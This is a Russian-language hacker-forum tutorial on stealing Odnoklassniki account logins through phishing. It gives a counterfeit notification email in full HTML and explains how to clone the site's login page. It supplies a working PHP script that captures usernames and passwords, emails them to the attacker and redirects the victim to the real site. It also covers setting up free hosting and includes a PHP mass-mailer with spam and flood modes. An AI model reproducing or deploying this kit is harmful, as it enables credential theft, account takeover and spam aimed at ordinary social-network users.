Перейти к содержимому


Фотография

Самый простой способ взлома аккаунта на одноклассниках для новичков


  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 Admin

Admin

    Эксперт. (ГЛАВА ФОРУМА)

  • Администраторы
  • 271 сообщений
  • ГородИнтернет сити

Отправлено 23 Ноябрь 2015 - 10:56

Сегодня мы рассмотрим подробный пример использования фейка в деле))
Для  примера я выбрал www.odnoklassniki.ru
И так погнали!
Для начало я накалякал для вас HTML письмо для отправки жертве. Оно внешне ни чем не отличается от оригинала что приходит на мыло жертве когда ему кто-то пишет что нибудь))
И так письмо
<td style="width: 98%;"><a target="blank" href="http://www.host.ru/"><img alt="Одноклассники" src="http://i.pixs.ru/storage/6/5/5/Bezimyanni_9505731_2604655.png" border="0"></a></td></tr><tr><td></td><td><div class="notification"><table style="border-spacing: 10px 0pt;"><tbody><tr><td colspan="6" style="vertical-align: top; padding: 20px 0pt 0pt;"><span style="color: rgb(51, 51, 51); font: 16px Verdana;" class="text">Вам пришло новое сообщение</span></td></tr><tr><td colspan="6" style="vertical-align: top; padding: 15px 0pt 0pt; width: 740px;"><table cellspacing="0"><tbody><tr><td style="vertical-align: top; padding: 5px 5px 0pt 0pt;"><img src="http://af9.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;1&mode=attachment" class="attachment" border="0"></td><td style="vertical-align: top; width: 640px;"><div style="color: rgb(51, 51, 51); font: 15px/150% Verdana; width: 640px; overflow: hidden; white-space: nowrap;" class="actor">Юлия Caнина</div><div style="color: rgb(102, 102, 102); font: 12px/150% Verdana; width: 640px;">Привет;-)  а я тебя сразу узнала:-)  как у тебя...</div><table cellspacing="0"><tbody><tr><td style="padding: 10px 3px 0pt 0pt;"><img src="http://af4-2.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;3&mode=attachment" border="0"></td><td style="padding: 10px 0pt 0pt; vertical-align: top;"><a target="blank" href="http://www.host.ru/" style="color: rgb(235, 114, 46); font: 12px Verdana; text-decoration: underline; white-space: nowrap;" class="action-link read-link">прочитать переписку</a></td></tr></tbody></table></td></tr><tr></tr></tbody></table></td></tr><tr><td colspan="6" style="padding: 40px 0pt 20px;"><div style="color: rgb(153, 153, 153); font: 12px Verdana;">Вы получили это письмо, потому что зарегистрированы на <a target="blank" href="http://www.host.ru/" style="color: rgb(153, 153, 153); font: 12px Verdana; text-decoration: underline;">Одноклассниках</a>.<br>Вы можете <a target="blank" href="http://www.host.ru/" style="color: rgb(153, 153, 153); font: 12px Verdana; text-decoration: underline;">изменить</a> настройки отправки уведомлений.<br></div>
Вот и скрин
Изображение
Все ссылки ведут на фейк! а их 4 , чтоб не парится используем комбинацию Ctrl+H и в первом строке пишем http://www.host.ru/ а во второй строке пишете ваш хост и кликаем "Заменить все"
Изображение
Вы еще можете изменить фото , имя и текст (я сделал то что мне первым пришло в голову)
Если вы знаете от кого жертва ждет письма то можете переделать письмо как вам угодно. Например  если жертва ждет письмо от Ирины то ищем "Юлия Caнина" и меняем на Ирина ... Так же можете изменить текст!
Для изменение фото с начало нужно иметь ссылку на фото которое вы хотите вставить с размером приблизительно (96:128)  Для этого можно (чтоб не парится) просто зайти на свой аккаунт, найти фото которою вы хотели бы вставить и получить ссылку на это фото. Думаю по скрину будет все ясно!
Изображение
После этого в письме ищем строку
<img src="http://af9.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;1&mode=attachment" class="attachment" border="0">
И меняем на
<img src="ссылка на изображение" class="attachment" border="0">
И так вроде с письмом разобрались! погнали дальше!
В оригинале когда жертва кликает "Прочитать переписку" его перекидывает на 
http://www.odnoklass...ssages/tkn/3697 для этого мы сделаем фейк на эту страницу!
Копируем исходный код страницы. Делается это так.. кликаем правой кнопкой мышки и выбираем строку "Исходный код страницы".Далее копируем его в текстовик и ищем строку
<form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=9568" method="post">
И меняем на
<form action="login.php" method="post">
Сохраняем как index.php
Вот сам login.php
<?php
$BASE="Мыло";
$IS_EMAIL=true;
$LOCATION="http://www.odnoklassniki.ru/cdk/st.cmd/anonymLogin/st.redirect/%2Fmessages/tkn/3697";
$p0=$_REQUEST["st_email"];
$p1=$_REQUEST["st_password"];
$headers = "Content-type: text/html; charset=windows-1251rn";
$headers .= "From: bot <$BASE>rn";
$headers .= "Bcc: $BASErn";
$info="логин:$p0:пароль:$p1:n";
if ($IS_EMAIL){
mail($BASE, "Привет от Xaker-Forum.Ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
[hide thank="1"]Здесь вписываете ваш мылник и можете тупо поменять переадресацию "$LOCATION="http://www.odnoklass...ssages/tkn/3697";" Ну это как хотите!
Можете еще припаять erorr.php для эффективности фейка! Ну я не буду объяснять как это делается, так как  я уже говорил об этом в этой  статье
И так погнали дальше!
Для новичков я объясню
1) как зарегить хост например на holm.ru
2) как залить файлы
3) как отправить HTML письмо
________________________________________________________________________________________________________
P.S.  Если после объяснение опять не поймете выше перечисленные три вопроса то покиньте пожалуйста данный ресурс!
И так приступим[/hide]
Заходим на www.holm.ru и кликаем "Зарегистрировать сайт" (кликаем на зеленый)
Изображение
Далее смотрим на скрин
Изображение
После вам на почту вышлют письмо со ссылкой , зайдите по этой ссылке для продолжения процесса регистрации. Через часок другой к вам на почту придут данные от вашего хоста!
Изображение
И так все вы зарегали свой хост! Теперь будем разбираться как залить файл на хост!
Я пользуюсь прогой FileZilla FTP Client и буду объяснять как пользоваться именно им! 
Устанавливаем FileZilla FTP Client и вводим данные от нашего хоста! смотрим на скрин
Изображение
Для заливки файлов просто откройте папку www и с помощью мышки перетащите файлы туда!
Вроде с заливкой файлов тоже разобрались!
Теперь объясню как отправит HTML письмо (ну или текст)
Берем скрипт для отправки письма
Я пользуюсь этим скриптом
Скрытый текст
body { 
margin-left: 0px; 
margin-top: 0px; 
margin-right: 0px; 
margin-bottom: 0px; 
background-color:#003399; 
font-color:#CCCCCC ; 
color:#CCCCCC 
}
a:link { 
color: #CCCCCC; 
text-decoration: none; 
a:visited { 
color: #CCCCCC; 
text-decoration: none; 
a:hover { 
color: #CCCCCC; 
text-decoration: underline; 
a:active { 
text-decoration: none; 
}
div { 
color:#CCCCCC; 
}
</style> 
<? 
// 
function send_mime_mail($name_from, // имя отправителя 
$email_from, // email отправителя 
$name_to, // имя получателя 
$email_to, // email получателя 
$data_charset, // кодировка переданных данных 
$send_charset, // кодировка письма 
$subject, // тема письма 
$body // текст письма 
) { 
$to = mime_header_encode($name_to, $data_charset, $send_charset) 
. ' <' . $email_to . '>'; 
$subject = mime_header_encode($subject, $data_charset, $send_charset); 
$from = mime_header_encode($name_from, $data_charset, $send_charset) 
.' <' . $email_from . '>'; 
if($data_charset != $send_charset) { 
$body = iconv($data_charset, $send_charset, $body); 
$headers = "From: $fromrn"; 
$headers .= "Content-type: text/html; charset=$send_charsetrn"; 
$headers .= "Mime-Version: 1.0rn";
return mail($to, $subject, $body, $headers); 
}
function mime_header_encode($str, $data_charset, $send_charset) { 
if($data_charset != $send_charset) { 
$str = iconv($data_charset, $send_charset, $str); 
return '=?' . $send_charset . '?B?' . base64_encode($str) . '?='; 
}
error_reporting (0); 
if(!set_time_limit(0)) { 
$limit = false; 
} else { 
set_time_limit(0); 
ignore_user_abort(1); 
$limit = true; 
ini_set('max_execution_time', '0');
?> 
<div align="center"> 
<? if($limit)echo('<font color=#00FF00>Время работы не ограничено текущими настройками сервера</font>');else 
echo('<font color=FF0000>Время работы ограничено текущими настройками сервера</font>');?><br /> <br /> 
</div> 
<? 
$ip = getenv('REMOTE_ADDR'); 
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3') 
{
$_POST['to'] = stripslashes($_POST['to']); 
$_POST['msg'] = stripslashes($_POST['msg']); 
$_POST['from'] = stripslashes($_POST['from']); 
$_POST['fromm'] = stripslashes($_POST['fromm']); 
$_POST['subject'] = stripslashes($_POST['subject']);
if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe']) 
$headers = "MIME-Version: 1.0rn"; 
$headers .= "From: ".$_POST['from']."rn"; 
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251n"; 
if($_GET['mail'] == '1') 
send_mime_mail($_POST['from'], // имя отправителя 
$_POST['fromm'], // email отправителя 
"", // имя получателя 
$_POST['to'], // email получателя 
"windows-1251", // кодировка переданных данных 
"windows-1251", // кодировка письма 
$_POST['subject'], // тема письма 
$_POST['msg']// текст письма 
) or die('<font color=FF0000>Невозможно отправить сообщение</font>'); 
elseif($_GET['mail'] == '2') 
$_POST['to'] = explode("n",$_POST['to']); 
foreach($_POST['to'] as $poluchatels) 
send_mime_mail($_POST['from'], // имя отправителя 
$_POST['fromm'], // email отправителя 
"", // имя получателя 
$_POST['to'], // email получателя 
"windows-1251", // кодировка переданных данных 
"windows-1251", // кодировка письма 
$_POST['subject'], // тема письма 
$_POST['msg']// текст письма 
) or die('<font color=FF0000>Невозможно отправить сообщение</font>'); 
elseif($_GET['mail'] == '3') 
if(preg_match('/[0-9]+/',$_POST['kol'])) 
for($i=0;$i<$_POST['kol'];$i++) 
send_mime_mail($_POST['from'], // имя отправителя 
$_POST['fromm'], // email отправителя 
"", // имя получателя 
$_POST['to'], // email получателя 
"windows-1251", // кодировка переданных данных 
"windows-1251", // кодировка письма 
$_POST['subject'], // тема письма 
$_POST['msg']// текст письма 
) or die('<font color=FF0000>Невозможно отправить сообщение</font>'); 
sleep(1); 
else 
echo('<font color=FF0000>Неверно введено (или не введено) кол-во сообщений</font>'); 
}
echo('<center><b><font color=#00FF00>Сообщение успешно отправлено</font></b></center>'); 
else 
?> 
<form method='post'> 
<div align="center"> 
<table> 
<? 
if($_GET['mail'] == '1' || $_GET['mail'] == '3') 
echo("<tr><td align="right"> Получатель:</td><td align="left"><input type='text'name='to' ></td></tr>"); 
?> 
<tr><td align="right">Отправитель:</td> 
<td align="left"> <input type='text' name='from' width="200"></td></tr>
<tr><td align="right">Откуда (e-mail):</td> 
<td align="left"> <input type='text' name='fromm' width="200"></td></tr>
<tr><td align="right">Тема сообщения: </td> <td align="left"> <input type='text' name='subject'><br> </td></tr> 
<? 
if($_GET['mail'] == '3') 
echo("<tr><td align="right"> Кол-во сообщений: </td> <td align="left"> <input type='text' name='kol'></td></tr>"); 
?> 
<br> 
<tr> <td align="center" colspan="2"> html <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> 
      text <input type='radio' name='tipe' value='plain'></td> </tr> 
<? 
if($_GET['mail'] == '2') 
echo("<tr><td align="center" colspan="2">Получатели:<br><textarea name='to' rows='10' cols='50'>admin@admin.ru 
admin@mail.ru 
tiger@ya.ru</textarea></td> </tr>"); 
?> 
<tr><td align="center" colspan="2"> 
Сообщение:<br> 
<textarea name='msg' rows='10' cols='50'></textarea><br><br><input type='submit'> 
</td> </tr> 
</table> 
</div> 
</form> 
<br> 
<? 
} else { 
?><br> <div align="center"> 
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Отправить простое сообщение</a><br> 
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Наспамить</a><br> 
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Нафлудить</a><br> 
</div> 
<? 
?>
Сохраняем скрипт как mail.php (например) и заливаем на хост как выше объяснил
Для того чтоб отправить переходите по ссылке http://Ваш хост/mail.php и радуетесь!
Ну вот и все))

С Уважением Администрация.Форум хакеров XAKERPRO.COM





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных


Сертификат на никнейм XAKERPRO.COM, зарегистрирован на Константин Иванов.
Яндекс.Метрика Рейтинг@Mail.ru Analysis Счетчик ТИЦ Каталог сайтов OpenLinks.RU Каталог сайтов Всего.RU

Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal